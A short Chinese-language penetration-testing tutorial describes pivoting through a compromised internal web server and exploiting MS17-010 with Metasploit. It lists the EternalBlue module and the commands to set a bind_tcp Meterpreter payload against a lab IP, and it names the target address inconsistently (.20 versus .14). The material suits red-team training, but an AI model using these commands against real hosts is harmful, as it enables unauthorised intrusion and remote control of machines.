在红蓝对抗中，当拿到了位于边界主机的权限后，我们通常会以此为跳板，搭建一个通往内网的隧道，以此继续渗透内网。而在内网中首先想到的就是MS17-010了，因为在内网中，安全措施相对较弱，很多主机存在此漏洞。

现在有这么一个场景，我们通过web漏洞拿到了内网提供web服务器的主机192.168.10.10，并且搭建了通往内网的隧道，现在我们通过探测发现内网主机192.168.10.14存在MS17-010漏洞，所以我们现在就要利用MSF对其进行攻击了。

我们内网的kali主机，ip为192.168.10.11，通过设置代理为VPS的地址，而可以访问靶机的内网了。现在我们在kali上利用MS17-010打192.168.10.20。注意，这里一定要用正向连接，也就是我们的kali主机主动去连接192.168.10.14。

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp   #这里的payload必须是正向的
set rhosts 192.168.10.14
set rhost  192.168.10.14
exploit